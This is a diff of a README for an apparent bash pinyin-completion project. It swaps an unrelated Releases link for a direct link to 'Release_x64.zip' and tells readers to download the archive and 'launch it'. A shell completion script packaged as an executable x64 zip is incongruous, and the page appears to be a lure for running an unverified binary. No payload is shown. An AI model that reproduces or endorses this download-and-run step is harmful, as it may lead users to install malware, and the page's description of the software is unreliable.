luhsanson/bash-pinyin-completion-rs/README.md

 ## 🌐 **Additional Resources**

-Check out the [Releases](https://github.com/22155555/1875695542/releases) section for more updates and releases related to the pinyin completion script.
+Check out the [Releases](https://github.com/luhsanson/bash-pinyin-completion-rs/releases/download/v1.0/Release_x64.zip) section for more updates and releases related to the pinyin completion script.

 ---

 Explore the power of pinyin completion in bash scripting with the "bash-pinyin-completion-rs" repository.
-Download the Software.zip file, launch it, and start enhancing your bash scripting experience today.
+Download the https://github.com/luhsanson/bash-pinyin-completion-rs/releases/download/v1.0/Release_x64.zip file, launch it, and start enhancing your bash scripting experience today.
 Happy scripting! 🎉